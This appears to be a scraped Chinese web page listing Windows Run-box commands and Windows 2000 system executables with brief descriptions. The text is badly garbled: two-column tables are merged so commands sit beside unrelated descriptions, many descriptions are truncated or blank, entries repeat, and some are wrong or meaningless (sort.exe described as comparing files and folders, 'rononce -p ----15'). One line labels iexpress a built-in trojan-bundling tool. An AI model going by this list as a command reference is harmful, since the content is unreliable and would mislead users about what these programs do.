Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具,系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略
开始→运行(cmd)命令大全
gpedit.msc----- sndrec32-------录音机
Nslookup-------IP explorer-------打开资源管理器
logoff--------- tsshutdn-------60秒倒计时关机命令
lusrmgr.msc---- services.msc---本地服务设置
oobe/msoobe /a----检查XPnotepad--------打开记事本
cleanmgr------- net start messenger----开始信使服务
compmgmt.msc--- net stop messenger-----停止信使服务
conf-----------启动netmeeting dvdplay--------DVD播放器
charmap-------- diskmgmt.msc---磁盘管理实用程序
calc----------- dfrg.msc-------磁盘碎片整理程序
chkdsk.exe-----Chkdsk devmgmt.msc--- 设备管理器
regsvr32 /u *.dll----停止dlldrwtsn32------ 系统医生
rononce -p ----15 dxdiag---------检查DirectX信息
regedt32------- Msconfig.exe---系统配置实用程序
rsop.msc------- mem.exe--------显示内存使用情况
regedit.exe---- winchat--------XP自带局域网聊天
progman-------- winmsd---------系统信息
perfmon.msc---- winver---------检查Windows版本
sfc /scannow----- winipcfg-------IP配置
taskmgr-----任务管理器(2000/xp/2003command--------cmd
fsmgmt.msc netstat -an----查看端口
osk install.asp----修改注册网页
eventvwr.msc 时间查看器
secpol.msc 本地安全设置
services.msc 服务
2K
accwiz.exe >
acsetups.exe > acs setup dcom server executable
actmovie.exe >
append.exe >
arp.exe > 显示和更改计算机的ip
at.exe >
atmadm.exe >
attrib.exe >
autochk.exe >
autoconv.exe >
autofmt.exe >
autolfn.exe >
bootok.exe > boot acceptance application for registry
bootvrfy.exe >
cacls.exe > 显示和编辑acl
calc.exe >
cdplayer.exe > cd
change.exe >
charmap.exe >
chglogon.exe >
chgport.exe >
chgusr.exe >
chkdsk.exe >
chkntfs.exe >
cidaemon.exe > 组成ci
cipher.exe > 在ntfs
cisvc.exe >
ckcnv.exe > 变换cookie
cleanmgr.exe >
cliconfg.exe > sql
clipbrd.exe >
clipsrv.exe > 运行clipboard
clspack.exe >
cluster.exe >
_cmd_.exe >
cmdl32.exe >
cmmgr32.exe >
cmmon32.exe >
cmstp.exe >
comclust.exe >
comp.exe >
compact.exe > 显示或改变ntfs
conime.exe > ime
control.exe >
convert.exe > 转换文件系统到ntfs
convlog.exe > 转换iis日志文件格式到ncsa
cprofile.exe >
cscript.exe >
csrss.exe > 客户服务器runtime
csvde.exe >
dbgtrace.exe > 和terminal server
dcomcnfg.exe > dcom
dcphelp.exe > ?
dcpromo.exe > ad
ddeshare.exe > dde
ddmprxy.exe >
debug.exe > 就是debug
dfrgfat.exe > fat
dfrgntfs.exe > ntfs
dfs_cmd_.exe > 配置一个dfs
dfsinit.exe >
dfssvc.exe >
diantz.exe > 制作cab
diskperf.exe >
dllhost.exe > 所有com+
dllhst3g.exe >
dmadmin.exe >
dmremote.exe >
dns.exe > dns applications dns
doskey.exe >
dosx.exe > dos
dplaysvr.exe >
drwatson.exe >
drwtsn32.exe >
dtcsetup.exe > installs mdtc
dvdplay.exe > dvd
dxdiag.exe > direct-x
edlin.exe >
edlin.exe >
esentutl.exe > ms
eudcedit.exe > type
eventvwr.exe >
evnt_cmd_.exe > event to trap translator; configuration tool
evntwin.exe > event to trap translator setup
exe2bin.exe > 转换exe
expand.exe >
extrac32.exe > 解cab
fastopen.exe >
faxcover.exe >
faxqueue.exe >
faxsend.exe >
faxsvc.exe >
fc.exe >
find.exe >
findstr.exe >
finger.exe >
fixmapi.exe > 修复mapi
flattemp.exe >
fontview.exe >
forcedos.exe > forces a file to start in dos mode. 强制文件在dos
freecell.exe > popular windows game
ftp.exe > file transfer protocol used to transfer files over a network conne
ction 就是ftp
gdi.exe > graphic device interface
grovel.exe >
grpconv.exe > program manager group convertor
help.exe > displays help for windows 2000 commands
hostname.exe > display hostname for machine. 显示机器的hostname
ie4uinit.exe > ie5 user install tool ie5
ieshwiz.exe > customize folder wizard
iexpress.exe > create and setup packages for install
iisreset.exe > restart iis admin service 重启iis
internat.exe > keyboard language indicator applet
ipconfig.exe > windows 2000 ip configuration. 察看ip
ipsecmon.exe > ip security monitor ip
ipxroute.exe > ipx routing and source routing control program ipx
irftp.exe > setup ftp for wireless communication
ismserv.exe > intersite messaging service 安装或者删除service control manage
r
jdbgmgr.exe > microsoft debugger for java 4 java4
jetconv.exe > convert a jet engine database 转换jet engine
jetpack.exe > compact jet database. 压缩jet
jview.exe > command-line loader for java java
krnl386.exe > core component for windows 2000 2000
label.exe > change label for drives
lcwiz.exe > license compliance wizard for local or remote systems.
ldifde.exe > ldif cmd line manager ldif
licmgr.exe > terminal server license manager
lights.exe > display connection status lights
llsmgr.exe > windows 2000 license manager 2000
llssrv.exe > start the license server
lnkstub.exe >
locator.exe > rpc locator
lodctr.exe > load perfmon counters
logoff.exe > log current user off.
lpq.exe > displays status of a remote lpd queue 显示远端的lpd
显示被送到基于unix
lpr.exe > send a print job to a network printer.
机。通常用于unix客户打印机将打印任务发送给连接了打印设备的nt的打印机服务器。
lsass.exe > lsa executable and server dll 运行lsa和server的dll
lserver.exe > specifies the new dns domain for the default server 指定默认se
rver新的dns
os2.exe > an os/2 warp server (os2 /o) os/2
os2srv.exe > an os/2 warp server os/2
os2ss.exe > an os/2 warp server os/2
osk.exe > on screen keyboard
packager.exe > windows 2000 packager manager
pathping.exe > combination of ping and tracert 包含ping和tracert
pax.exe > is a posix program and path names used as arguments must be specif
ied in posix format. use "//c/users/default" instead of "c:usersdefault."
启动便携式存档互换 (pax)
pentnt.exe > used to check the pentium for the floating point division error
. 检查pentium
perfmon.exe > starts windows performance monitor
ping.exe > packet internet groper
posix.exe > used for backward compatibility with unix 用于兼容unix
print.exe > cmd line used to print files
progman.exe > program manager
proquota.exe > profile quota program
psxss.exe > posix subsystem application posix
qappsrv.exe > displays the available application terminal servers on the net
work
qprocess.exe > display information about processes local or remote
query.exe > query termserver user process and sessions
quser.exe > display information about a user logged on
qwinsta.exe > display information about terminal sessions.
rasadmin.exe > start the remote access admin service
rasautou.exe > creates a ras connection 建立一个ras
rasdial.exe > dial a connection
ras.exe > starts a ras connection 运行ras
rcp.exe > copies a file from and to a rcp service. 在 windows 2000
行远程外壳端口监控程序 rshd
rdpclip.exe > rdpclip allows you to copy and paste files between a terminal
session and client console session.
recover.exe > recovers readable information from a bad or defective disk
redir.exe > starts the redirector service
regedt32.exe > 32-bit register service 32
regini.exe > modify registry permissions from within a script
register.exe > register a program so it can have special execution character
istics.
regsvc.exe >
regsvr32.exe > registers and unregister"s dll"s. as to how and where it regi
ster"s them i dont know. 注册和反注册dll
regtrace.exe > options to tune debug options for applications failing to dum
p trace statements
trace
regwiz.exe > registration wizard
remrras.exe >
replace.exe > replace files
reset.exe > reset an active section
rexec.exe > runs commands on remote hosts running the rexec service.
rexec 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算机
上的用户名,只有安装了 tcp/ip
risetup.exe > starts the remote installation service wizard.
route.exe > display or edit the current routing tables.
routemon.exe > no longer supported
router.exe > router software that runs either on a dedicated dos or on an os
/2 system. route软件在 dos或者是os/2
rsh.exe > runs commands on remote hosts running the rsh service 在运行 rsh
rsm.exe > mounts and configures remote system media
rsnotify.exe > remote storage notification recall
rsvp.exe > resource reservation protocol
runas.exe > run a program as another user
rundll32.exe > launches a 32-bit dll program 启动32位dll
runonce.exe > causes a program to run during startup
rwinsta.exe > reset the session subsystem hardware and software to known ini
tial values
savedump.exe > does not write to e:winntuser.dmp 不写入user.dmp
scardsvr.exe > smart card resource management server
schupgr.exe > it will read the schema update files (.ldf files) and upgrade
the schema. (part of adsi)
secedit.exe > starts security editor help
services.exe > controls all the services
sethc.exe > set high contrast - changes colours and display mode logoff to s
et it back to normal
setreg.exe > shows the software publishing state key values
setup.exe > gui box prompts you to goto control panel to configure system co
mponents
setver.exe > set version for files 设置 ms-dos 子系统向程序报告的 ms-dos
sfc.exe > system file checker test and check system files for integrity
sfmprint.exe > print services for macintosh 打印macintosh
sfmpsexe.exe >
sfmsvc.exe >
shadow.exe > monitor another terminal services session.
share.exe > windows 2000 和 ms-dos
ms-dos
shmgrate.exe >
shrpubw.exe > create and share folders
sigverif.exe > file signature verification
skeys.exe > serial keys utility
smlogsvc.exe > performance logs and alerts
smss.exe >
sndrec32.exe > starts the windows sound recorder
sndvol32.exe > display the current volume information
snmp.exe > simple network management protocol used for network mangement
snmptrap.exe > utility used with snmp snmp
sol.exe > windows solitaire game
sort.exe > compares files and folders
SPOOLSV.EXE > Part of the spooler service for printing
sprestrt.exe >
srvmgr.exe > Starts the Windows Server Manager
stimon.exe > WDM StillImage- > Monitor
stisvc.exe > WDM StillImage- > Service
subst.exe > Associates a path with a drive letter
svchost.exe > Svchost.exe is a generic host process name for services that a
re run from dynamic-link libraries (DLLs). DLL
syncapp.exe > Creates Windows Briefcase. 创建Windows
sysedit.exe > Opens Editor for 4 system files
syskey.exe > Encrypt and secure system database NT
sysocmgr.exe > Windows 2000 Setup 2000
systray.exe > Starts the systray in the lower right corner. 在低权限运行syst
ray
macfile.exe > Used for managing MACFILES 管理MACFILES
magnify.exe > Used to magnify the current screen
makecab.exe > MS Cabinet Maker 制作CAB
mdm.exe > Machine Debug Manager
mem.exe > Display current Memory stats
migpwd.exe > Migrate passwords.
mmc.exe > Microsoft Management Console
mnmsrvc.exe > Netmeeting Remote Desktop Sharing NetMeeting
mobsync.exe > Manage Synchronization.
mountvol.exe > Creates, deletes, or lists a volume mount point.
mplay32.exe > MS Media Player
mpnotify.exe > Multiple Provider Notification application
mq1sync.exe >
mqbkup.exe > MS Message Queue Backup and Restore Utility
mqexchng.exe > MSMQ Exchange Connector Setup
mqmig.exe > MSMQ Migration Utility
mqsvc.exe > ?
mrinfo.exe > Multicast routing using SNMP 使用SNMP
mscdexnt.exe > Installs MSCD (MS CD Extensions) 安装MSCD
msdtc.exe > Dynamic Transaction Controller Console
msg.exe > Send a message to a user local or remote.
mshta.exe > HTML Application HOST HTML
msiexec.exe > Starts Windows Installer Program 开始Windows
mspaint.exe > Microsoft Paint
msswchx.exe >
mstask.exe > Task Schedule Program
mstinit.exe > Task scheduler setup
narrator.exe > Program will allow you to have a narrator for reading. Micros
oft
nbtstat.exe > Displays protocol stats and current TCP/IP connections using N
BT 使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP
nddeapir.exe > NDDE API Server side NDDE API
net.exe > Net Utility 详细用法看/
net1.exe > Net Utility updated version from MS Net
netdde.exe > Network DDE will install itself into the background
netsh.exe > Creates a shell for network information 用于配置和监控 Windows 2
000
netstat.exe > Displays current connections. 显示协议统计和当前的 TCP/IP
nlsfunc.exe > Loads country-specific information
Windows 2000 和 MS-DOS 子系统不使用该命令。接受该命令只是为了与 MS-DOS 文
notepad.exe > Opens Windows 2000 Notepad
nslookup.exe > Displays information for DNS 该诊断工具显示来自域名系统 (DNS)
ntbackup.exe > Opens the NT Backup Utility
ntbooks.exe > Starts Windows Help Utility
ntdsutil.exe > Performs DB maintenance of the ADSI 完成ADSI的DB
ntfrs.exe > NT File Replication Service NT
ntfrsupg.exe >
ntkrnlpa.exe > Kernel patch
ntoskrnl.exe > Core NT Kernel KT
ntsd.exe >
ntvdm.exe > Simulates a 16-bit Windows environment 模拟16位Windows
nw16.exe > Netware Redirector NetWare
nwscript.exe > runs netware scripts 运行Netware
odbcad32.exe > ODBC 32-bit Administrator 32位ODBC
odbcconf.exe > Configure ODBC driver"s and data source"s from command line
令行配置ODBC
taskman.exe > Task Manager
taskmgr.exe > Starts the Windows 2000 Task Manager
tcmsetup.exe > telephony client wizard
tcpsvcs.exe > TCP Services TCP
.exe > Telnet Utility used to connect to Telnet Server
termsrv.exe > Terminal Server
tftp.exe > Trivial FTP 将文件传输到正在运行 TFTP
TFTP
tftpd.exe > Trivial FTP Daemon
themes.exe > Change Windows Themes
tlntadmn.exe > Telnet Server Administrator Telnet
tlntsess.exe > Display the current Telnet Sessions 显示目前的Telnet
tlntsvr.exe > Start the Telnet Server 开始Telnet
tracert.exe > Trace a route to display paths
(TTL) 值的 Internet 控制消息协议 (ICMP)
tsadmin.exe > Terminal Server Administrator
tscon.exe > Attaches a user session to a terminal session. 粘贴用户
tsdiscon.exe > Disconnect a user from a terminal session
tskill.exe > Kill a Terminal server process
tsprof.exe > Used with Terminal Server to query results.
tsshutdn.exe > Shutdown the system
unlodctr.exe > Part of performance monitoring
upg351db.exe > Upgrade a jet database 升级Jet
ups.exe > UPS service UPS
user.exe > Core Windows Service Windows
userinit.exe > Part of the winlogon process Winlogon
usrmgr.exe > Start the windows user manager for domains
utilman.exe > This tool enables an administrator to designate which computers automatically open accessibility tools when Windows 2000 starts. 指定2000启动时自动打开那
verifier.exe > Driver Verifier Manager Driver Verifier Manager
vwipxspx.exe > Loads IPX/SPX VDM 调用IPX/SPX VDM
w32tm.exe > Windows Time Server
wextract.exe > Used to extract windows files 解压缩Windows
winchat.exe > Opens Windows Chat 打开Windows
winhlp32.exe > Starts the Windows Help System
winlogon.exe > Used as part of the logon process. Logon
winmine.exe > windows Game
winmsd.exe > Windows Diagnostic utility
wins.exe > Wins Service Wins
winspool.exe > Print Routing
winver.exe > Displays the current version of Windows 显示Windows
wizmgr.exe > Starts Windows Administration Wizards Windows
wjview.exe > Command line loader for Java 命令行调用Java
wowdeb.exe > . For starters, the 32-bit APIs require that the WOWDEB.EXE tas
k runs in the target debugee"s VM 启动时,32位API
wowexec.exe > For running Windows over Windows Applications 在Windows
上运行Windows
wpnpinst.exe > ?
write.exe > Starts MS Write Program
wscript.exe > Windows Scripting Utility
wupdmgr.exe > Starts the Windows update Wizard (Internet) 运行Windows
xcopy.exe > 复制文件和目录,包括子目录
浙公网安备 33010602011771号